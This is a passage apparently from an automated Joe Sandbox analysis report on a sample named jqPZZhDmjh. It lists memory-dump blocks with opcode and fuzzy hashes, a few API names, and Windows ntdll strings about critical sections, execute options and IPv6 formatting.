                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83d42ca3e22b48321b6ad4a4f9dbaec61583139b4e7d5ae39c25a5120d30766a
                                                                            • Instruction ID: d340d62813435fb865698b43fd2ec7581f599893ca46f8b737d72fd9d33e5f13
                                                                            • Opcode Fuzzy Hash: 83d42ca3e22b48321b6ad4a4f9dbaec61583139b4e7d5ae39c25a5120d30766a
                                                                            • Instruction Fuzzy Hash: 17F0B4319166E19FE732DB5CC4D4BA57BE4FB00620F084D6AF58B8F543C724D880C691
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cef53b56d66985912f718dbba009738bc3b14c4f4d518385e8d0ae106e05b0f5
                                                                            • Instruction ID: a894d8568e6a06c8fe6df34b60d2f45918eca54e76883a5f1ce509a6efe8462a
                                                                            • Opcode Fuzzy Hash: cef53b56d66985912f718dbba009738bc3b14c4f4d518385e8d0ae106e05b0f5
                                                                            • Instruction Fuzzy Hash: 6EF0276B4156810ACB326B7CFC602D16B59A752114F4D3089E4A057305C774A893CB75
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f727bfc0c5fa7048c4c6d3d3e383a9ff5e1845bf49a27a22c5cdf27be5cd650d
                                                                            • Instruction ID: d3c11040af076fb0ea2700b812acb1bd5679a836da34180c6681f7387f98f7ed
                                                                            • Opcode Fuzzy Hash: f727bfc0c5fa7048c4c6d3d3e383a9ff5e1845bf49a27a22c5cdf27be5cd650d
                                                                            • Instruction Fuzzy Hash: 43F0E271D116519FE72A9B1CC18CB1B7BE4BB817A0F089925D40A8F552C664E880CE50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                            • Instruction ID: 2ccc77c77a261466c909105c242ff182ad3713faf68cc0d5cec3fdf7c3dc4420
                                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                            • Instruction Fuzzy Hash: 0FE0D872300A022BE7119E598CC0F477B6EFFD6B10F04407DB6045F251CAE2DC0986A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                            • Instruction ID: 0639c4cfbb509d04fccee60836511e587302772474dca826ab5fce21759c9d9f
                                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                            • Instruction Fuzzy Hash: E1F0E572200204DFE3209F49DE40F52B7F8EB06B64F01C029E6088B260D379EC40CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                            • Instruction ID: 2003d0cef33691cd9901d157e71e174d66936c7e7a241ed158985a6e655abe81
                                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                            • Instruction Fuzzy Hash: 88F0E53A2047559FDB1ACF19C490AD6BBF8FB51350F000498F8468F381D732E982CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                            • Instruction ID: 3f2b2c038fa8054680ff8a1e1eb8eb3a8b56183cc59faa046cc81b49b3881653
                                                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                            • Instruction Fuzzy Hash: 8FE09232A54146AFD3251E598808B7A77E7BBD07B0F150429E200CF150DBF0DC40C798
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ee49f9deafca26630ae4f2f49a0b8125d536918b7327e2848874fde3108d0a59
                                                                            • Instruction ID: 36cafd155268c84b7b588cb1b3642b3f4a31b838df32a7d951a46143e9f94dd5
                                                                            • Opcode Fuzzy Hash: ee49f9deafca26630ae4f2f49a0b8125d536918b7327e2848874fde3108d0a59
                                                                            • Instruction Fuzzy Hash: EDF06531A25A938FE772F72CD984B657BE4AF50631F5A0654D4858BA52CB24DC40C650
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                            • Instruction ID: e6b058748ddaddd1e8218659a78813dafad92494cc8160ebdd7f70b77654e5b2
                                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                            • Instruction Fuzzy Hash: 07E0DF72A00110BFEB219799CE05FAABEBCEB90EA0F050194FA01EB190E530EE00C690
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                            • Instruction ID: ec42399b2e99c592e15e39a2882e58fe53f263c00987f1974cb0804e9b2cbe98
                                                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                            • Instruction Fuzzy Hash: C1E02B716403408BCF20AA1DC900A53B7ECDF91620F16856DE90407312C370F887C6D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                            • Instruction ID: 289a5a1d84dda8aad2fe774422bcdd1cb8fd46c861395b81a0e347f14381ebae
                                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                            • Instruction Fuzzy Hash: FDE0C231080A16EFDB322F15DC00F6A7AE1FF94B11F108C6DE2811E1A487B1AC81CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 13f454862ab56c2874086e793d794964c6bfac00725aa2912c483fb8d7047aaa
                                                                            • Instruction ID: 83dcc2db74b853d84433688cd5f63d5e682a12ce1d3ddc4fc881fdb6ce7bbd69
                                                                            • Opcode Fuzzy Hash: 13f454862ab56c2874086e793d794964c6bfac00725aa2912c483fb8d7047aaa
                                                                            • Instruction Fuzzy Hash: EDE08C321004656BC321FE5DDD50E8A739AFFE4660F044225B1518B290CA60BC00CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                            • Instruction ID: 592ec381d3e173e6f13b5bcc469335747d692e241a2421ed534d3b974a29f021
                                                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                            • Instruction Fuzzy Hash: 37E08633511A1487C728DE18D515B7677E5FF45730F09463EA6134B790C574E544C794
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                            • Instruction ID: 120845ff6cfa151bff97f1837572beaddc246cc3723cac227bef00b5c0c80d7e
                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                            • Instruction Fuzzy Hash: 2DD05E36511A50AFC3329F1BEE00C53BBF9FFC4F207050A2EA54683A20C770A846CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                            • Instruction ID: 597b1160607ae07e148b3611edf2a319f3a054463a0f4895aceaccb949a6b1a2
                                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                            • Instruction Fuzzy Hash: 92D0A932224A20AFD772AA1CFC00FC333E8BB88B20F064459F008CB150C360AC81CA84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                            • Instruction ID: 3beff6f272af56d04c257eb369e71fd8662ff13ae411028b327c87eaccf95daa
                                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                            • Instruction Fuzzy Hash: 08E0EC35A50A859FDF52DF99CA40F9EBBB5FB94B40F190058E5085F660C725A900CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                            • Instruction ID: 74173bc73816950818823981cf22477f9967e2ed5f8fa0046618b8720ea01219
                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                            • Instruction Fuzzy Hash: 87D02232262031A7CB285A95A800FAF6905BFC0A90F0A002D340A9B800C1048C42C2E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                            • Instruction ID: a4441d734726581dc1d7dd4fb23c5ce360e4b6b8d7c03c95a4dd081bde6545aa
                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                            • Instruction Fuzzy Hash: C9D012371E054DBBCB119FA6DC01F957BA9FBA4BA0F448020B5048B5A0C63AE950D584
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a01e54bae6c388291e35b77fa2f86448d32f0e8f7436fe2073a98371e6272ab
                                                                            • Instruction ID: 49e77be856ae96fd05e24060f775823caa8453b589ef83910e728704d6bf7ced
                                                                            • Opcode Fuzzy Hash: 2a01e54bae6c388291e35b77fa2f86448d32f0e8f7436fe2073a98371e6272ab
                                                                            • Instruction Fuzzy Hash: F0D0A730912412CFDF1ADF4CCE14D6E36F4FF10640B40006CE70156920D364DC11CE00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                            • Instruction ID: dc9316cde83baa98f645a867166378e50c15366b71f530a09e25295bfcc78a9d
                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                            • Instruction Fuzzy Hash: BBC012322A0648AFC712AE99CD01F467BA9FBA8B40F004021F2048B670C631E820EA84
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                            • Instruction ID: 81b2bfcf6a5ca09e8a628390cbec3ef8c09447c84a473503cfa9739a7d6cea2c
                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                            • Instruction Fuzzy Hash: B3D01236100249EFCB11DF45C890D9A772AFBD8710F108019FD190B6508A31ED62DB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                            • Instruction ID: 815d9665216c7fe48cc248060b336f67ab60d5a6f4820f9858c1555b303fed0a
                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                            • Instruction Fuzzy Hash: 17C04C757015468FCF16DF59D694F4577E4F754740F155894E805CB721E725EC01CA10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bfd8f01174f6c724f528a535b4e6e211b7bc27fdb5040f9d78e3a7093f26f74f
                                                                            • Instruction ID: d37b22b98255a2513614214e078afd8d6f08783ca10919d91634c4e2164bf8fe
                                                                            • Opcode Fuzzy Hash: bfd8f01174f6c724f528a535b4e6e211b7bc27fdb5040f9d78e3a7093f26f74f
                                                                            • Instruction Fuzzy Hash: 81900231A05C00529145B5584C845474009A7E0301B55C411E4424698DCA148A965361
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 66abed3c15a7ffbd8ccc0b27f22bf0a20b029108753de28138999ca7c9f2d52f
                                                                            • Instruction ID: c03c3c091620cef25d5f3ec51060bc461e02bb15365727f1e7c1e222bb7a479a
                                                                            • Opcode Fuzzy Hash: 66abed3c15a7ffbd8ccc0b27f22bf0a20b029108753de28138999ca7c9f2d52f
                                                                            • Instruction Fuzzy Hash: ED900261A01900824145B5584C044076009A7E1301395C515A45546A4DC61889959369
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 901d7972e3b3288c94c97cc0dffbdf4ba6687939b1789a2e7d1c454bae7f99da
                                                                            • Instruction ID: c235cc36f7ef50eec74e98cf4fceeb0cbaa1bcaa03d25fdda39c8de147d4d742
                                                                            • Opcode Fuzzy Hash: 901d7972e3b3288c94c97cc0dffbdf4ba6687939b1789a2e7d1c454bae7f99da
                                                                            • Instruction Fuzzy Hash: 0590023160584882D145B5584804A47001997D0305F55C411A40647D8ED6258E95B761
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 247184a20c1534184d1807438036b58c71fe22bc82d08e32d84d5e4083dd564a
                                                                            • Instruction ID: 923aa41f79f9cb08605e15fd0b68d32e513b0bb38fd809ebd3409c42075dc385
                                                                            • Opcode Fuzzy Hash: 247184a20c1534184d1807438036b58c71fe22bc82d08e32d84d5e4083dd564a
                                                                            • Instruction Fuzzy Hash: 5E90023160180842D109B5584C04687000997D0301F55C411AA024799FD66589D17231
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Execute=1, xrefs: 01624713
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01624725
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01624742
                                                                            • ExecuteOptions, xrefs: 016246A0
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01624655
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016246FC
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01624787
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016202E7
                                                                            • RTL: Re-Waiting, xrefs: 0162031E
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016202BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0162728C
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 016272C1
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01627294
                                                                            • RTL: Resource at %p, xrefs: 016272A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
